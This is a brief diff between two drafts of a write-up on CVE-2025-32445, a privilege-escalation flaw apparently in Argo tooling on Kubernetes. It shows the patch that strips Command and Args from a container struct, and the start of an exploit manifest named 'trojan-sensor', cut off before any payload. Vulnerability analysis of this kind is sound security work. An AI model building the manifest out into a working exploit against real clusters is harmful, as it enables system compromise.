CVE-2025-32445

 Executive Summary (TL;DR)

-The Flaw: A Struct Too Far
+The Flaw: The Struct Reuse Sin

 The Code: The Smoking Gun

-Let's look at the fix to understand the severity of the break.
-The patch in commit 18412293a699f559848b00e6e459c9ce2de0d3e2 replaces the standard Kubernetes struct with a neutered, custom version.
+Let's look at the fix to understand the break.
+The patch, authored in commit 18412293a699f559848b00e6e459c9ce2de0d3e2, explicitly rips out the standard Kubernetes container definition and replaces it with a sanitized, local version.

 type Container struct {

-// Command and Args are GONE.
+// Command and Args are GONE

-VolumeMounts []corev1.VolumeMount `json:"volumeMounts,omitempty"`
+VolumeMounts []corev1.VolumeMount `json:"volumeMounts,omitempty" protobuf:"bytes,9,rep,name=volumeMounts"`

-// ... other benign fields ...
+// ...

 }

-The Exploit: From YAML to Root
+The Exploit: From Sensor to System Admin

 apiVersion: argoproj.io/v1alpha1

-kind: EventSource
+kind: Sensor

 metadata:

-name: pwn-cluster
+name: trojan-sensor

 spec: